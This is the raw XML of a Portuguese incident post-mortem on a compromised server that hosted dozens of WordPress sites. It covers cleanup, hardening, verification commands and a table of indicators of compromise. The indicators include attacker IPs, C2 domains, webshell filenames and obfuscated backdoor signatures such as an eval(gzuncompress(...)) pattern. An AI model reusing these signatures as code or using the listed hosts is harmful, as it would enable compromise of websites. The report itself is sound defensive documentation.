        <w:rPr/>
        <w:t xml:space="preserve"> + apagar cachedata + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Etapa 2 — Camada Servidor/ROOT (14–15/08/2026)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Motor de reinfecção (myservices/ssshd) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>neutralizado</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">; C2 bloqueado; confirmado que ainda estava </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>ativo</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (reinfecção em curso, interrompida).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Removidas as 120 chaves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>ElPatrono1337</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> e as 120 regras de sudo NOPASSWD; minerador e watchdog encerrados.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Auditoria de persistência de boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>antes</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> do reboot (evitou reinfecção no boot).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Re-higienização dos sites</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (o doorway havia sido re-injetado pelo motor): core WordPress reinstalado limpo em 44 sites; bloco de redirect removido dos temas (zero na rede); arquivos-porta (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>pages/search/buy/goods.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) e backdoors em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> removidos; webshells em pastas de nome aleatório removidos; um site com loop auto-regenerativo contido com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> limpo+imutável.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Hardening:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> root somente por chave (senha não loga mais); MariaDB só em </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (+ firewall 3306); fail2ban instalado; repo morto desabilitado; 186 patches de segurança (kernel/OpenSSH/OpenSSL/sudo); PowerDNS corrigido.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Camada de proteção WordPress: mu-plugins de segurança em 111 sites (bloqueio de criação de admin oculto, bloqueio de XML-RPC, rate-limit de login).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Credenciais rotacionadas:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> root, CyberPanel, OpenLiteSpeed e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>senhas de banco de 111 sites</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (com verificação e rollback por site; 0 falhas).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Reboot (kernel novo) + verificação pós-boot: persistência ausente, serviços ativos, DNS ok, sites 200, malware zero na rede. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Nota sobre versão:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> os sites afetados rodam WordPress </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>7.0.3, que é uma versão real e legítima</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. O problema nunca foi a versão, e sim a injeção de código no núcleo/tema. Todos os artefatos removidos foram preservados em quarentena.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Impacto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Redirecionamento de visitantes de celular para doorways (perda de tráfego/receita; risco de flag do Google em toda a rede).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Controle administrativo total do servidor pelo atacante por ~6 dias (nível root).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Uso indevido de recursos (mineração) e hospedagem de conteúdo malicioso (doorways de spam/SEO; kit de phishing bancário) a partir da infraestrutura.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Contas de administrador fraudulentas.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Exfiltração de dados: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>não confirmada</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. Por prudência, as credenciais de banco foram consideradas comprometidas e já substituídas. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8. O Que Mudamos (prevenção)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Fim da senha única compartilhada</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — senha forte e única por serviço + cofre. Foi a causa-raiz dos dois vetores.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SSH sem senha para root: acesso administrativo agora exige chave.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Banco de dados nunca exposto: escuta somente em localhost.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DISALLOW_FILE_MODS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> + mu-plugins de defesa na aplicação.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fail2ban + bloqueio de IOCs no firewall.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Patches de segurança em dia; kernel atualizado.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Detecção de persistência de sistema antes de reiniciar.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Gestão de acesso:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> a equipe responsável precisa ter acesso documentado e testado a toda a infraestrutura (inclusive root/SO) antes de um incidente — a falta de acesso de root foi o que separou a resposta em duas etapas e permitiu a reinfecção no intervalo.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Revisão periódica de administradores (contas com data "1970-…", e-mails estranhos) e bloqueio de PHP em uploads/.well-known. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>9. Como Verificar (qualquer pessoa com acesso pode conferir)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Servidor (root):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>grep -rl ElPatrono /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys | wc -l   # 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>systemctl is-enabled myservices ; systemctl is-active myservices                     # masked/inactive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>ss -tlnp | grep 3306                                                                  # 127.0.0.1:3306</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config                                    # prohibit-password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>systemctl is-active fail2ban                                                          # active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>grep -lE "define\('A', '[^']*::" /home/*/public_html/*.php | wc -l                    # 0 (doorway)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Por site (WordPress):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>wp option get home                                                                    # = siteurl (nao doorway)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>grep -rl 'ushort\.\|u-short\.' &lt;docroot&gt; --include='*.php'                            # vazio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>wp db query "SELECT COUNT(*) FROM wp_posts WHERE post_content LIKE '%ushort.%'"        # 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>wp user list --role=administrator                                                     # sem jwpadmin/thradmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>find &lt;docroot&gt; -path '*well-known*' -name '*.php'                                      # vazio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>curl -A "Android Mobile" -H "Referer: https://www.google.com/" &lt;url-post&gt;             # sem redirect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>10. Indicadores de Comprometimento (IOCs) — Consolidado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96"/>
        <w:gridCol w:w="8943"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="0B5394" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Categoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8943" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="0B5394" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="283"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Indicadores</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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IPs do invasor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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216.126.229.185</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (login WordPress + upload de tema)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>172.86.66.0/24</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>172.86.92.0/24</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (uso dos webshells)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>91.92.42.7</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (login de ROOT via SSH)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>195.24.237.240</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (C2 do motor de reinfecção)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Domínios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Doorway (DDoS-Guard, Belize): </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>ushort.company</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>ushort.dev</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>ushort.observer</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>ushort.today</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>ushort.org</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>u-short.net</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:br/>
              <w:t xml:space="preserve">C2 de fallback: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>digital.digitaldatainsights.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Contas fraudulentas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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jwpadmin</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>thradmin</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (data falsa 1970-10-10 10:10:10)</w:t>
              <w:br/>
              <w:t xml:space="preserve">Revisar: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (21 sites) e </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>novoadmin_noob</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (noobnews)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Artefatos WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Temas-webshell: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>upmibpk</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>xdpelfa</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:br/>
              <w:t xml:space="preserve">Webshells: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>anonymousfox.php, shell.php, 0day.php, tool.php, ws.php, ws0.php, pvt.php, admin.php, t.php</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (em wp-includes/{html-api,sitemaps,theme-compat,Text}, .well-known/, uploads/, raiz)</w:t>
              <w:br/>
              <w:t xml:space="preserve">Assinatura: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>eval(gzuncompress(str_replace(… file_get_contents(__FILE__) …)))</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:br/>
              <w:t xml:space="preserve">Backdoor em index.php: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>define('A', 'janNN.ofuXXXX/askul::…')</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:br/>
              <w:t xml:space="preserve">Redirect (core+tema): variável </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>$lineindexinstall</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> / JS matchMedia+location.replace</w:t>
              <w:br/>
              <w:t xml:space="preserve">Arquivos-porta root-level: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>pages.php, search.php, buy.php, goods.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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Artefatos de sistema (root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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Serviço: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>myservices.service</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">; Downloader: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/usr/bin/ssshd</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (SHA-256 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>2bcc91f…e7a74</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>)</w:t>
              <w:br/>
              <w:t xml:space="preserve">Marcador oculto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/usr/bin/.locatione</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">; Minerador: Kinsing em </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>/var/tmp/&lt;hex8&gt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">; Chave SSH: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>ElPatrono1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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NÃO confundir (falsos-positivos legítimos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="89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getID3, TCPDF (usam gzuncompress), tema real </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>consultstreet</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (ThemeArile), CSS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>menu-shortcut</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>PaxHeaders</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> (lixo de tar), Yoast </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
              </w:rPr>
              <w:t>wpseo-redirects</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>, mu-plugins da Hostinger, jetpack-waf, webp-express</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>11. Riscos Residuais e Recomendações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Padrão-ouro:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> root ficou comprometido ~6 dias — a recomendação ideal é </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>reconstruir (rebuild)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> o servidor. Optou-se pelo endurecimento in-place para não perder os sites; se houver qualquer sinal de reinfecção, reconstruir.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Restringir os painéis (CyberPanel/OpenLiteSpeed) por IP e/ou habilitar 2FA.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Formalizar o acesso de root da equipe a toda a infraestrutura.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Manter patches e monitoramento de re-drop por alguns dias.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Se houver flag no Google, pedir revisão no Search Console.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Remover a quarentena e os logs de rotação após operação estável. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>12. Observação sobre Credenciais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novas senhas (root, CyberPanel, OpenLiteSpeed, admins WordPress e bancos de dados) e as chaves de acesso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>não</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> são reproduzidas neste documento por segurança. Estão armazenadas em cofre privado da equipe. Este relatório pode ser compartilhado sem expor segredos.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Consolas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36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:eastAsia="Calibri;Arial;sans-serif" w:cs="Calibri;Arial;sans-serif"/>
      <w:color w:val="202124"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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40"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A1A1A"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="2" w:space="2" w:color="CCCCCC"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0B5394"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Serif CJK SC" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="333333"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Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace" w:eastAsia="Consolas;Courier New;monospace" w:cs="Consolas;Courier New;monospace"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19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left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21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8" w:color="DDDDDD"/>
        <w:left w:val="single" w:sz="2" w:space="8" w:color="DDDDDD"/>
        <w:bottom w:val="single" w:sz="2" w:space="8" w:color="DDDDDD"/>
        <w:right w:val="single" w:sz="2" w:space="8" w:color="DDDDDD"/>
      </w:pBdr>
      <w:shd w:fill="F5F5F5" w:val="clear"/>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace" w:eastAsia="Consolas;Courier New;monospace" w:cs="Consolas;Courier New;monospace"/>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableHeading">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="TableContents"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:shd w:fill="0B5394" w:val="clear"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="21"/>
      <w:szCs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>Post-Mortem Contabo — Doorway + Root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